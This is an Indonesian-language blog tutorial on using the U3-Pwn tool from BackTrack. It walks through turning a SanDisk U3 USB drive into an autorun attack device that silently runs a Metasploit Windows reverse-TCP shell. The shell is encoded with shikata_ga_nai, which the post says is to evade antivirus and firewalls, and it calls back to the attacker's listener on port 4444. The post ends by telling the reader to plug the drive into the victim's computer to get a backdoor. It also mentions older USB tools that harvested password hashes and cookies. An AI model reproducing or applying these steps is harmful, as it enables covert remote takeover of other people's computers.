Home » » Cara menggunakan U3 Pwn Di Backtrack

Cara menggunakan U3 Pwn Di Backtrack

Written By Unknown on Sabtu, 22 Maret 2014 | 07.47

Cara menggunakan U3 Pwn

Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

Requirement :



The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host yang mendapatkan ip 192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
Enter Ip Address for reverse listener: 192.168.56.101

Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
Enter the device to change iso image on (example /dev/sde1): /dev/sdb1


~ .__ °.__ 0 o ^ .__ °__ `´
°____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__.
/ \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | |
| o°| \ | / |_| |__\___ \ ___/\ °\___| o| /| | \/ || |° \___ O|
|___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____|
`´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´

************************************************** **********************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************** **********************


Generating Shellcode Please Wait...
|************************************************* *| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...)


related link:
http://packetstormsecurity.org/files...tion-Tool.html
  1. Categories:
  2. Exploitation Tools
Tags: backdoor, metasploit, u3pwn

Sumber : http://indobacktrack.or.id/content.php?303-Cara-menggunakan-U3-Pawn
Share this article :

Posting Komentar

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Belajar Dasar-Dasar TKJ - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger